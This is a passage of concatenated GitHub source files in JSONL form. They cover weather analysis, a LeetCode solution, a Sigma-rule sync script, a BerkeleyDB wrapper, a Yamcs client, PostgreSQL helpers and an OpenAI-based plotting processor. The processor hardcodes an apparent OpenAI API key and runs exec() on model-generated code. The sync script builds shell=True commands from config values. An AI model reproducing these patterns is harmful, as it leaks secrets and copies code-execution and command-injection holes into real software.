middleterm_of_place_in_2006_and_2018('Θράκη')\n    # returns: In Θράκη, 2018 had exactly the same temperature as 2017\n\n    cleaned_data = get_cleaned_data()\n    regions = ['Ήπειρος', 'Θεσσαλία', 'Θράκη', 'Κρήτη', 'Μακεδονία', 'Ν. Αιγαίου', 'Ν. 
Ιονίου', 'Πελοπόννησος',\n               'Στερεά Ελλάδα']\n\n    n = 2006 # default n year\n\n    if region not in regions: # validation\n        return \"Argument must be a Greek region, case sensitive!\"\n\n    region_data_2018 = {}\n    region_data_nyear = {}\n\n    for i in cleaned_data: # creating a dictionary with each of the region's cities as key and empty list as value\n        if i[1] == region and i[3] == '2018':\n            region_data_2018[i[2]] = []\n\n    year_and_data_lengths = {} # finding what year has most data\n    for i in range(2006, 2018):\n        year_and_data_lengths[i] = []\n\n    for year in range(2006, 2018):\n        for row in cleaned_data:\n            if row[1] == region and row[3] == str(year):\n                var = year_and_data_lengths[year]\n                if row[2] not in year_and_data_lengths[year]: # in each year/key, each city must be only once\n                    var.append(row[2])\n                    year_and_data_lengths[year] = var\n\n    for key in year_and_data_lengths: # finding which year has most cities as value / most data\n        year_and_data_lengths[key] = len(year_and_data_lengths[key])\n\n    # according to task, we compare 2018 to the year with the most data, i.e. the key with the largest count\n    n = max(year_and_data_lengths, key=year_and_data_lengths.get)\n\n    for i in cleaned_data:\n        if i[1] == region and i[3] == str(n):\n            region_data_nyear[i[2]] = []\n\n    # data in 2018\n    data_in_2018 = []\n    for i in cleaned_data:\n        if i[3] == '2018':\n            data_in_2018.append(i)\n\n    # data in year n\n    data_in_nyear = []\n    for i in cleaned_data:\n        if i[3] == str(n):\n            data_in_nyear.append(i)\n\n    for key in region_data_2018: # in region_data_2018 appending each MEAN_TEMP as value in list for each city in\n    # region.\n        for row in data_in_2018:\n            if row[2] == key:\n                var = region_data_2018[key]\n                var.append(row[6]) # appending in value the mean temp\n                region_data_2018[key] = var\n\n    # for nyear\n    for key in region_data_nyear: # in region_data_nyear appending each MEAN_TEMP as value in list for each city\n    # in region.\n        for row in data_in_nyear:\n            if row[2] == key:\n                var = region_data_nyear[key]\n                var.append(row[6]) # appending in value the mean temp\n                region_data_nyear[key] = var\n\n    for key in region_data_2018: # value = middle term([MEANS_TEMPS])\n        var = region_data_2018[key]\n        region_data_2018[key] = middleterm(var)\n    for key in region_data_nyear:\n        var = region_data_nyear[key]\n        try: # there are some empty lists, try except because we will get zero division error in middle term function\n            region_data_nyear[key] = middleterm(var)\n        except:\n            continue\n\n    region_2018_tempslist = []\n    region_nyear_tempslist = []\n\n    for i in region_data_2018:\n        region_2018_tempslist.append(region_data_2018[i])\n    for i in region_data_nyear:\n        region_nyear_tempslist.append(region_data_nyear[i])\n\n    final_temperature_middle_term_2018 = round(middleterm(region_2018_tempslist), 2) # middle term of temperatures\n    # list, rounding to 2 decimals\n    final_temperature_middle_term_nyear = round(middleterm(region_nyear_tempslist), 2)\n\n    if final_temperature_middle_term_2018 > final_temperature_middle_term_nyear:\n        return \"In \" + str(region) + \", 2018 was hotter than \" + str(n) + \" by \" + str(\n            round((final_temperature_middle_term_2018 - final_temperature_middle_term_nyear), 2)) + \" degrees Celsius.\"\n    elif final_temperature_middle_term_2018 < final_temperature_middle_term_nyear:\n        return \"In \" + str(region) + \" , \" + str(n) + \" was hotter than 2018\" + \" by \" + str(\n            round((final_temperature_middle_term_nyear - final_temperature_middle_term_2018), 2)) + \" degrees Celsius.\"\n    elif final_temperature_middle_term_2018 == final_temperature_middle_term_nyear:\n        return \"In \" + str(region) + \" , 
\" + \"2018 had excactly the same temperature as \" + str(n)","repo_name":"ElSarik/GreekWeatherDataAnalysis","sub_path":"functions/dataset_api.py","file_name":"dataset_api.py","file_ext":"py","file_size_in_byte":15131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"17567173816","text":"# buy low sell high \n# gadrion - 03/04/2022\n\ndef maxProfit(prices):\n l, r = 0, 1 # left=buy, right=sell\n maxP = 0\n\n while r < len(prices):\n # profitable ?\n if prices[l] < prices[r]:\n profit = prices[r] - prices[l]\n if profit > maxP:\n maxP = profit\n else:\n l = r\n r += 1\n return maxP\n\n\nif __name__ == \"__main__\":\n prices = [7,1,5,3,6,4]\n print(maxProfit(prices))\n","repo_name":"gadr1on/PMP","sub_path":"python/concepts/leetcode_75_questions/02_sell_buy_stock.py","file_name":"02_sell_buy_stock.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"38943646264","text":"\"\"\"Get Sigma rules from various git repositories\"\"\"\n\nimport json\nimport logging\nimport sys\nfrom subprocess import check_output, call\n\nlogging.basicConfig(format=r\"%(asctime)s %(message)s\", level=logging.INFO)\n\n\ndef check(command):\n \"\"\"Wrapper around subprocess.check_ouptut\"\"\"\n return check_output(command, shell=True)\n\n\ndef get_rules():\n \"\"\"Load in rule sources config file\"\"\"\n\n try:\n rule_sources = json.loads(sys.argv[1])\n except IndexError:\n with open(\"rule_sources.json\") as rule_sources:\n rule_sources = json.load(rule_sources)\n return rule_sources\n\n\ndef main():\n \"\"\"Main\"\"\"\n sync_dirs = []\n cleanup_dirs = []\n for source in get_rules():\n try:\n repo = source[\"repo\"]\n except IndexError:\n logging.error(\"Missing field 'repo'\")\n continue\n\n branch = source.get(\"branch\", \"master\")\n path = source.get(\"path\", \"\")\n\n # Clone\n call(f\"git clone {repo} > /dev/null 2>&1\", shell=True)\n repo_dir = repo.split(\"/\")[-1].split(\".\")[0]\n check(\n f\"cd {repo_dir} && git checkout {branch} > /dev/null 2>&1 && cd {'../'*len(repo_dir.split('/'))}\")\n\n # Save for sync and cleanup outside of for loop\n cleanup_dirs.append(repo_dir)\n sync_dirs.append(f\"{repo_dir}/{path}\")\n\n # Sync all sync_dirs together into ./rules\n check(\"rm -rf rules && mkdir rules\")\n check(f\"rsync -rtvu {' '.join(sync_dirs)} rules\")\n\n # Move rules into build dir\n logging.info(\"Moving rules to engine build directory\")\n build_dir = \"../images/rules/\"\n check(f\"rm -rf {build_dir}\")\n check(f\"mv rules {build_dir}\")\n\n # Remove directories\n logging.info(\"Cleaning up\")\n cleanup_dirs.append(\"rules\")\n for directory in cleanup_dirs:\n logging.info(f\"Removing {directory}\")\n check(f\"rm -rf {directory}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"boozallen-darklabs/k8s-go-sigma-streamer","sub_path":"helpers/update_rules.py","file_name":"update_rules.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"73929669099","text":"import sys\nfrom module.description import Description\n\nif __name__ == \"__main__\":\n desc = Description()\n state, description = desc.init()\n print(state, description)\n if state < 0:\n sys.exit(0)\n\n sentence_list = [\n \n '她闭着眼睛,绝美的脸庞显露出痛苦的神情', # 神态\n ]\n state, desc_info = desc.get_all_descriptions(sentence_list)\n if desc_info['num'] == 1:\n print(\"是环境描写\")\n else:\n 
print(\"不是环境描写\")\n \n # print(desc_info)\n","repo_name":"tal-tech/environment_depiction_sentence_detection","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"9710751833","text":"# Requires bsddb3 package.\nimport bsddb3\nfrom bsddb3.db import DBNotFoundError\n\nfrom kvkit.backends.helpers import KVHelper\n\n\nclass BerkeleyDB(KVHelper, bsddb3._DBWithCursor):\n def __init__(self, filename, flag='c', mode=0o666, btflags=0,\n cache_size=None, maxkeypage=None, minkeypage=None,\n page_size=None, lorder=None):\n\n self.filename = filename\n flags = bsddb3._checkflag(flag, filename)\n env = bsddb3._openDBEnv(cache_size)\n db = bsddb3.db.DB(env)\n if page_size is not None:\n db.set_pagesize(page_size)\n if lorder is not None:\n db.set_lorder(lorder)\n db.set_flags(btflags)\n if minkeypage is not None:\n db.set_bt_minkey(minkeypage)\n if maxkeypage is not None:\n db.set_bt_maxkey(maxkeypage)\n db.open(self.filename, bsddb3.db.DB_BTREE, flags, mode)\n super(BerkeleyDB, self).__init__(db)\n\n def __getitem__(self, key):\n if isinstance(key, slice):\n if key.start > key.stop or key.step:\n return self.get_slice_rev(key.start, key.stop)\n else:\n return self.get_slice(key.start, key.stop)\n else:\n return super(BerkeleyDB, self).__getitem__(key)\n\n def get_slice(self, start, end):\n try:\n key, value = self.set_location(start)\n except DBNotFoundError:\n raise StopIteration\n else:\n if key > end:\n raise StopIteration\n yield key, value\n\n while True:\n try:\n key, value = self.next()\n except DBNotFoundError:\n raise StopIteration\n else:\n if key > end:\n raise StopIteration\n yield key, value\n\n def get_slice_rev(self, start, end):\n if start is None or end is None:\n start, end = end, start\n\n if start is None:\n key, value = self.last()\n else:\n try:\n key, value = self.set_location(start)\n except DBNotFoundError:\n key, value = self.last()\n\n if start is None or key <= start:\n yield key, value\n\n while True:\n try:\n key, value = self.previous()\n except DBNotFoundError:\n raise StopIteration\n else:\n if key < end:\n raise StopIteration\n yield key, value\n","repo_name":"coleifer/kvkit","sub_path":"kvkit/backends/berkeleydb.py","file_name":"berkeleydb.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"92"} +{"seq_id":"20307229426","text":"import datetime\nfrom typing import List, Optional\n\nfrom yamcs.core.context import Context\nfrom yamcs.core.helpers import to_server_time\nfrom yamcs.protobuf.tco import tco_pb2\nfrom yamcs.tco.model import TCOStatus, TofInterval\n\n\nclass TCOClient:\n \"\"\"\n Client for interacting with a Time Correlation service managed by Yamcs.\n \"\"\"\n\n def __init__(self, ctx: Context, instance: str, service: str):\n super(TCOClient, self).__init__()\n self.ctx = ctx\n self._instance = instance\n self._service = service\n\n def get_status(self) -> TCOStatus:\n \"\"\"\n Retrieve the TCO status.\n \"\"\"\n response = self.ctx.get_proto(f\"/tco/{self._instance}/{self._service}/status\")\n message = tco_pb2.TcoStatus()\n message.ParseFromString(response.content)\n return TCOStatus(message)\n\n def reconfigure(\n self,\n accuracy: Optional[float] = None,\n validity: Optional[float] = None,\n ob_delay: Optional[float] = None,\n default_tof: Optional[float] = None,\n ):\n \"\"\"\n Updates one or more TCO options\n\n :param 
accuracy:\n            Accuracy in seconds.\n        :param validity:\n            Validity in seconds.\n        :param ob_delay:\n            Onboard delay in seconds.\n        :param default_tof:\n            Default ToF in seconds. This value is used if the ToF estimator\n            does not find a matching interval.\n        \"\"\"\n        req = tco_pb2.TcoConfig()\n        if accuracy is not None:\n            req.accuracy = accuracy\n        if validity is not None:\n            req.validity = validity\n        if ob_delay is not None:\n            req.onboardDelay = ob_delay\n        if default_tof is not None:\n            req.defaultTof = default_tof\n\n        url = f\"/tco/{self._instance}/{self._service}/config\"\n        self.ctx.post_proto(url, data=req.SerializeToString()) # TODO should be patch\n\n    def add_tof_interval(\n        self, start: datetime.datetime, stop: datetime.datetime, polynomial: List[float]\n    ):\n        \"\"\"\n        Defines a ToF interval for the ERT range ``[start, stop]``, specifying\n        a polynomial function of the form: `tof = a + bx + cx^2 + ...` where `x`\n        is ERT minus the provided start date.\n\n        :param start:\n            ERT start\n        :param stop:\n            ERT stop\n        :param polynomial:\n            Coefficients in the order ``[a, b, c, ...]``\n        \"\"\"\n        self.add_tof_intervals([TofInterval(start, stop, polynomial)])\n\n    def add_tof_intervals(self, intervals: List[TofInterval]):\n        \"\"\"\n        Adds multiple ToF intervals at once.\n\n        :param intervals:\n            List of ToF intervals.\n        \"\"\"\n        req = tco_pb2.AddTimeOfFlightIntervalsRequest()\n        for interval in intervals:\n            tof = req.intervals.add()\n            tof.ertStart.MergeFrom(to_server_time(interval.start))\n            tof.ertStop.MergeFrom(to_server_time(interval.stop))\n            tof.polCoef.extend(interval.polynomial)\n\n        url = f\"/tco/{self._instance}/{self._service}/tof:addIntervals\"\n        self.ctx.post_proto(url, data=req.SerializeToString())\n\n    def remove_tof_intervals(self, start: datetime.datetime, stop: datetime.datetime):\n        \"\"\"\n        Removes previously registered ToF intervals whose start date\n        falls in the specified range ``[start, stop]``.\n\n        :param start:\n            ERT start\n        :param stop:\n            ERT stop\n        \"\"\"\n        req = tco_pb2.DeleteTimeOfFlightIntervalsRequest()\n        req.start.MergeFrom(to_server_time(start))\n        req.stop.MergeFrom(to_server_time(stop))\n\n        url = f\"/tco/{self._instance}/{self._service}/tof:deleteIntervals\"\n        self.ctx.post_proto(url, data=req.SerializeToString())\n\n    def reset_coefficients(self):\n        \"\"\"\n        Resets current TCO coefficients, as well as any\n        collected samples.\n        \"\"\"\n        url = f\"/tco/{self._instance}/{self._service}:reset\"\n        self.ctx.post_proto(url)\n\n    def override_coefficients(\n        self, utc: datetime.datetime, obt: int, gradient: float = 0, offset: float = 0\n    ):\n        \"\"\"\n        Manually override the association between UTC and\n        onboard time.\n\n        .. 
note::\n If later on you want to revert to automatically computed\n coefficients, use :meth:`reset_coefficients`.\n\n :param utc:\n UTC\n :param obt:\n Onboard time\n :param gradient:\n Gradient\n :param offset:\n Offset\n \"\"\"\n req = tco_pb2.TcoCoefficients()\n req.utc.MergeFrom(to_server_time(utc))\n req.obt = obt\n req.gradient = gradient\n req.offset = offset\n\n url = f\"/tco/{self._instance}/{self._service}/coefficients\"\n self.ctx.post_proto(url, data=req.SerializeToString())\n","repo_name":"yamcs/python-yamcs-client","sub_path":"yamcs-client/src/yamcs/tco/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"92"} +{"seq_id":"19489073996","text":"from qgis.PyQt.QtCore import QSettings\nfrom qgis.PyQt.QtGui import QColor\nfrom qgis.PyQt.QtWidgets import QWidget, QGridLayout\nfrom qgis.core import QgsCoordinateTransform, QgsProject\nfrom qgis.gui import QgsMapToolPan, QgsMapCanvas\nfrom qgis.utils import iface\n\nfrom ThRasE.utils.system_utils import block_signals_to\n\n\nclass RenderWidget(QWidget):\n def __init__(self, parent=None):\n QWidget.__init__(self, parent)\n self.setupUi()\n self.active_layers = None # instances of active layers\n self.crs = None\n\n def setupUi(self):\n gridLayout = QGridLayout(self)\n gridLayout.setContentsMargins(0, 0, 0, 0)\n self.canvas = QgsMapCanvas()\n self.canvas.setCanvasColor(QColor(255, 255, 255))\n self.canvas.setStyleSheet(\"border: 0px;\")\n settings = QSettings()\n self.canvas.enableAntiAliasing(settings.value(\"/qgis/enable_anti_aliasing\", False, type=bool))\n self.setMinimumSize(15, 15)\n # action pan and zoom\n self.default_point_tool = QgsMapToolPan(self.canvas)\n self.canvas.setMapTool(self.default_point_tool, clean=True)\n\n gridLayout.addWidget(self.canvas)\n\n def refresh(self):\n if self.active_layers is not None:\n [active_layer.layer.reload() for active_layer in self.active_layers if active_layer.is_active]\n [active_layer.layer.triggerRepaint() for active_layer in self.active_layers if active_layer.is_active]\n self.canvas.refreshAllLayers()\n\n def set_crs(self, crs):\n self.crs = crs\n self.update_render_layers()\n\n def update_render_layers(self):\n with block_signals_to(self):\n # set the CRS of the canvas view\n if self.crs:\n # use the crs of thematic raster to edit\n self.canvas.setDestinationCrs(self.crs)\n else:\n # use the crs set in Qgis\n self.canvas.setDestinationCrs(iface.mapCanvas().mapSettings().destinationCrs())\n # get all valid activated layers\n valid_layers = [active_layer.layer for active_layer in self.active_layers if active_layer.is_active]\n if len(valid_layers) == 0:\n self.canvas.setLayers([])\n self.refresh()\n return\n # set to canvas\n self.canvas.setLayers(valid_layers)\n # set init extent from other view if any is activated else set layer extent\n from ThRasE.gui.main_dialog import ThRasEDialog\n others_extents = [view_widget.render_widget.canvas.extent() for view_widget in ThRasEDialog.view_widgets\n if view_widget.is_active and view_widget.render_widget != self\n and not view_widget.render_widget.canvas.extent().isEmpty()]\n if others_extents:\n # set extent using the extent of the other valid view (or self) with at least one layer\n extent = others_extents[0]\n self.update_canvas_to(extent)\n elif self.canvas.extent().isEmpty():\n # first layer to render\n # set the extent using the extent of the Qgis project but first transform the crs if it is different\n new_layer = 
valid_layers[0]\n                transform = QgsCoordinateTransform(new_layer.crs(), self.canvas.mapSettings().destinationCrs(), QgsProject.instance())\n                new_extent = transform.transformBoundingBox(new_layer.extent())\n                self.canvas.setExtent(new_extent)\n\n            self.refresh()\n\n    def update_canvas_to(self, new_extent):\n        with block_signals_to(self.canvas):\n            self.canvas.setExtent(new_extent)\n            self.refresh()\n","repo_name":"SMByC/ThRasE","sub_path":"gui/render_widget.py","file_name":"render_widget.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"92"}{"seq_id":"20652157363","text":"# work_with_db.py\nfrom sqlalchemy import create_engine, Column, Integer, String\nfrom sqlalchemy.orm import Session, declared_attr, declarative_base\n\n\n# The class that the declarative base is built on is usually\n# named the same as the declarative base class itself.\nclass Base:\n\n    @declared_attr\n    def __tablename__(cls):\n        return cls.__name__.lower()\n\n    id = Column(Integer, primary_key=True)\n\n\nBase = declarative_base(cls=Base)\n\n\nclass Pep(Base):\n    pep_number = Column(Integer, unique=True)\n    name = Column(String(200))\n    status = Column(String(20))\n\n    def __repr__(self):\n        # When print() is called, the values of the\n        # pep_number and name fields will be displayed.\n        return f'PEP {self.pep_number} {self.name}'\n\n\n\nfrom sqlalchemy import insert, select, update, delete\nif __name__ == '__main__':\n    engine = create_engine('sqlite:///sqlite.db', echo=False)\n    session = Session(engine)\n\n    result = session.execute(\n        select(Pep).where(Pep.status == 'Active')\n    )\n    print(result.all())\n\n    session.execute(\n        update(Pep).where(Pep.pep_number == 8).values(status='Active')\n    )\n    session.commit()","repo_name":"authorIsRight/training_parsing_yap","sub_path":"work_with_db.py","file_name":"work_with_db.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}{"seq_id":"2824276512","text":"from .elevation import clear_cache, get_elevation\n\nfrom argparse import ArgumentParser\n\ndef main():\n    # set up command line arguments\n    parser = ArgumentParser()\n    parser.add_argument('--lat', type=float, default=None)\n    parser.add_argument('--lon', type=float, default=None)\n    parser.add_argument('--clean', action='store_true')\n\n    # parse command line input\n    args = parser.parse_args()\n\n    # clear the cache if desired\n    if args.clean:\n        clear_cache()\n\n    # get the elevation\n    lat, lon = args.lat, args.lon\n    if lat is not None:\n        if lon is not None:\n            print(get_elevation(lat=lat, lon=lon))\n        else:\n            raise Exception('Must specify longitude with --lon')\n    else:\n        if lon is not None:\n            raise Exception('Must specify latitude with --lat')\n        else:\n            pass\n\nif __name__ == '__main__':\n    main()","repo_name":"sgherbst/pyhigh","sub_path":"pyhigh/pyhigh.py","file_name":"pyhigh.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"}{"seq_id":"70714367661","text":"import json\nimport os\nimport sys\n\nimport openai\nimport pandas as pd\nimport sqlfluff\n\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\n\nimport numpy as np\nimport plotly.express as px\n\nROOT_PATH = os.path.join(os.path.dirname(__file__), \"../../\")\nsys.path.insert(0, ROOT_PATH)\n\nfrom binder.binder_params import 
DEFAULT_BINDER_PARAMS\nfrom binder.generation.generator import Generator\nfrom binder.nsql.database import NeuralDB\nfrom binder.nsql.nsql_exec import Executor\n\n\nclass Processor:\n def __init__(self, dataset, query, key = \"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\"):\n self.dataset = dataset\n self.query = query\n # Set the API key for the OpenAI account\n self.key = key\n openai.api_key = key\n\nclass PlotterProcessor(Processor):\n mode = 'plotter'\n\n def load_template_prompt(self):\n # Load the template prompt\n with open(\"templates/%s_template_prompt.txt\" % (self.mode), \"r\") as f:\n plotter_template = f.read()\n return plotter_template\n\n def load_client_prompt_prefix(self):\n # Load the template prompt\n with open(\"templates/%s_client_prompt_prefix.txt\" % (self.mode), \"r\") as f:\n plotter_template = f.read()\n return plotter_template\n\n def load_client_prompt_suffix(self, query):\n return \"Q: %s\\nNeuralPlot:\" % (query) \n\n def construct_data_header(self, tail_size = 3):\n prompt_prefix = self.load_client_prompt_prefix()\n tail_size = int(prompt_prefix.split('tail(')[1][:1])\n data_header = self.dataset.tail(tail_size).to_string() + \"\\n\"\n prompt_suffix = self.load_client_prompt_suffix(self.query)\n\n return prompt_prefix + data_header + prompt_suffix\n\n def construct_prompt(self):\n prompt = self.load_template_prompt() + self.construct_data_header(self.dataset)\n print(\n \"Prompt:\\n%s\" % (prompt)\n )\n return prompt\n\n def generate_response(self):\n # Use the GPT-3 model to generate text\n response = openai.Completion.create(\n engine=\"code-davinci-002\",\n prompt=self.construct_prompt(),\n max_tokens=128,\n temperature=0.5,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n )\n response_text = response[\"choices\"][0][\"text\"]\n print(\n \"response_text:\\n%s\" % (response_text)\n )\n return ';'.join(response_text.strip(' ').split(';')[:-1])\n\n def produce_payload(self, temp_file = \"temp.json\"):\n raw_response = None\n try:\n response = self.generate_response()\n raw_response = response\n response += \"\"\"; f = open(temp_file, \"w\"); f.write(fig.to_json()); f.close();\"\"\"\n\n # execute the response, which should result in a json file being written\n dataset = self.dataset # need this for successful exec\n exec(response)\n with open(temp_file, \"r\") as f:\n payload = json.load(f)\n \n payload['response_code'] = raw_response\n return payload\n except Exception as e:\n print('an exception e happened =', e)\n return {'error': str(e), 'query': raw_response}\n\nclass TableProcessor(Processor):\n mode = 'table'\n params = DEFAULT_BINDER_PARAMS\n\n def produce_payload(self):\n nsql = None \n try:\n generator = Generator(self.params, keys=[self.key])\n\n title = \"\" # TODO\n prompt_args = {\n 'table': self.dataset.head(),\n 'title': title,\n 'question': self.query\n }\n\n few_shot_prompt = generator.build_few_shot_prompt_from_file(\n file_path=self.params.prompt_file,\n n_shots=self.params.n_shots,\n )\n generate_prompt = generator.build_generate_prompt(\n data_item=prompt_args,\n generate_type=(self.params.generate_type,)\n )\n prompt = few_shot_prompt + \"\\n\\n\" + generate_prompt\n # Ensure the input length fit Codex max input tokens by shrinking the n_shots\n response_dict = generator.generate_one_pass(\n prompts=[(0, prompt)],\n verbose=False\n )\n text_logit_pairs = response_dict[0]\n nsql = max(text_logit_pairs, key=lambda x: x[1])[0]\n db = NeuralDB([{'table': self.dataset, 'title': title}])\n\n # nsql = post_process_sql(\n # 
sql_str=nsql,\n # df=db.get_table_df(),\n # process_program_with_fuzzy_match_on_db=True,\n # table_title=title\n # )\n\n executor = Executor(self.params, keys=[self.key])\n exec_answer = executor.nsql_exec(nsql, db)\n print('exec_answer=', exec_answer)\n formatted = sqlfluff.fix(nsql.replace('`', ''))\n payload = {\n 'nsql': formatted,\n 'data': exec_answer\n }\n\n return payload\n\n except Exception as e:\n print('an exception e happened =', e)\n return {'error': str(e), 'query': nsql}\n\n\nif __name__ == \"__main__\":\n dataset = pd.read_csv(\"temp.txt\")\n processor = PlotterProcessor(dataset, \"Histogram of Data Scientist salaries\")\n payload = processor.produce_payload()\n","repo_name":"sentient-productions/charter-app","sub_path":"server/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":5481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"28753183902","text":"import psycopg2\nimport json\n\n\nclass DBException(Exception):\n pass\n\n\ndef connect(dbname):\n import credentials\n try:\n con = psycopg2.connect(host=credentials.hostname, user=credentials.username, password=credentials.password,\n dbname=credentials.database)\n except psycopg2.Error as e:\n raise DBException(e.message)\n\n return con\n\n\ndef create_tables(cur, con):\n # don't create tables here\n # use file postgreSQL_schema.sql to init db\n #\n # you will need to search and replace 'username' in the sql file,\n # replacing it with the role name you use to access the database\n return True\n\n\ndef new_upload(inj_list, cur, con):\n try:\n cur.execute(\"\"\"\n INSERT INTO uploads (\n user_id,\n filename,\n origin, \n upload_time\n )\n VALUES (%s, %s, %s, CURRENT_TIMESTAMP) RETURNING id AS upload_id\"\"\", inj_list)\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n rows = cur.fetchall()\n return rows[0][0]\n\n\ndef get_random_id(upload_id, cur, con):\n try:\n cur.execute(\"SELECT random_id FROM uploads WHERE id = \" + str(upload_id) + \";\")\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n rows = cur.fetchall()\n return rows[0][0]\n\n\ndef write_mzid_info(peak_list_file_names,\n spectra_formats,\n analysis_software,\n provider,\n audits,\n samples,\n analyses,\n protocol,\n bib,\n upload_id, cur, con):\n try:\n cur.execute(\"\"\"UPDATE uploads SET \n peak_list_file_names = (%s),\n spectra_formats = (%s),\n analysis_software = (%s),\n provider = (%s),\n audits = (%s),\n samples = (%s),\n analyses = (%s),\n protocol = (%s),\n bib = (%s) \n WHERE id = (%s);\"\"\",\n (peak_list_file_names,\n spectra_formats,\n analysis_software,\n provider,\n audits,\n samples,\n analyses,\n protocol,\n bib,\n upload_id))\n con.commit()\n except psycopg2.Error as e:\n raise DBException(e.message)\n return True\n\ndef write_other_info(upload_id, crosslinks, ident_count, ident_file_size, upload_warnings, cur, con):\n try:\n cur.execute(\"\"\"UPDATE uploads SET contains_crosslinks = (%s), ident_count = (%s), ident_file_size = (%s)\n , upload_warnings = (%s)\n WHERE id = (%s);\"\"\", (crosslinks, ident_count, ident_file_size, json.dumps(upload_warnings), upload_id))\n\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n return True\n\n\ndef write_error(upload_id, error_type, error, cur, con):\n try:\n cur.execute(\"\"\"UPDATE uploads SET error_type = %s\n , upload_error = %s\n WHERE id = %s;\"\"\", (error_type, error, upload_id))\n con.commit()\n\n cur.execute(\"DELETE 
FROM db_sequences WHERE upload_id = \" + str(upload_id) + \";\")\n con.commit()\n\n cur.execute(\"DELETE FROM peptides WHERE upload_id = '\" + str(upload_id) + \"';\")\n con.commit()\n\n cur.execute(\"DELETE FROM peptide_evidences WHERE upload_id = \" + str(upload_id) + \";\")\n con.commit()\n\n cur.execute(\"DELETE FROM modifications WHERE upload_id = \" + str(upload_id) + \";\")\n con.commit()\n\n cur.execute(\"DELETE FROM spectra WHERE upload_id = \" + str(upload_id) + \";\")\n con.commit()\n\n cur.execute(\"DELETE FROM spectrum_identifications WHERE upload_id = \" + str(upload_id) + \";\")\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n return True\n\n\n# def write_protocols(inj_list, cur, con):\n# return True\n\ndef write_db_sequences(inj_list, cur, con):\n try:\n cur.executemany(\"\"\"\n INSERT INTO db_sequences (\n id,\n accession,\n protein_name,\n description,\n sequence,\n upload_id\n )\n VALUES (%s, %s, %s, %s, %s, %s) \"\"\", inj_list)\n # con.commit()\n #\n except psycopg2.Error as e:\n raise DBException(e.message)\n\n return True\n\n\ndef write_meta_data(*args):\n pass\n\n\ndef write_peptides(inj_list, cur, con):\n try:\n cur.executemany(\"\"\"\n INSERT INTO peptides (\n id,\n seq_mods,\n link_site,\n crosslinker_modmass,\n upload_id,\n crosslinker_pair_id\n )\n VALUES (%s, %s, %s, %s, %s, %s)\"\"\", inj_list)\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n\n return True\n\n\ndef write_modifications(inj_list, cur, con):\n try:\n cur.executemany(\"\"\"\n INSERT INTO modifications (\n id,\n upload_id,\n mod_name,\n mass,\n residues,\n accession\n )\n VALUES (%s, %s, %s, %s, %s, %s)\"\"\", inj_list)\n con.commit()\n except psycopg2.Error as e:\n raise DBException(e.message)\n\n return True\n\n\ndef write_peptide_evidences(inj_list, cur, con):\n try:\n cur.executemany(\"\"\"\n INSERT INTO peptide_evidences (\n peptide_ref,\n dbsequence_ref,\n protein_accession,\n pep_start,\n is_decoy,\n upload_id\n )\n VALUES (%s, %s, %s, %s, %s, %s)\"\"\", inj_list)\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n\n return True\n\n\ndef write_spectra(inj_list, cur, con):\n try:\n cur.executemany(\"\"\"\n INSERT INTO spectra (\n id, \n peak_list, \n peak_list_file_name, \n scan_id, \n frag_tol, \n upload_id, \n spectrum_ref,\n precursor_mz,\n precursor_charge\n )\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\", inj_list)\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n\n return True\n\n\ndef write_spectrum_identifications(inj_list, cur, con):\n try:\n cur.executemany(\"\"\"\n INSERT INTO spectrum_identifications (\n id,\n upload_id,\n spectrum_id,\n pep1_id,\n pep2_id,\n charge_state,\n rank,\n pass_threshold,\n ions,\n scores,\n exp_mz,\n calc_mz,\n meta1,\n meta2,\n meta3\n ) VALUES (%s, %s, %s, %s, %s, %s, %s, %s , %s, %s, %s, %s, %s, %s, %s)\"\"\", inj_list)\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n\n return True\n","repo_name":"lars-kolbowski/xiSPEC_ms_parser","sub_path":"PostgreSQL.py","file_name":"PostgreSQL.py","file_ext":"py","file_size_in_byte":7123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"18475479302","text":"import numpy as np\nimport cvxpy\n\n\nclass Parameters:\n def __init__(self):\n # 'N' is number of available technologies\n self.N = 12\n # 'M' is number of available products\n self.M = 6\n # 'A' contains information about how many tonnes of 
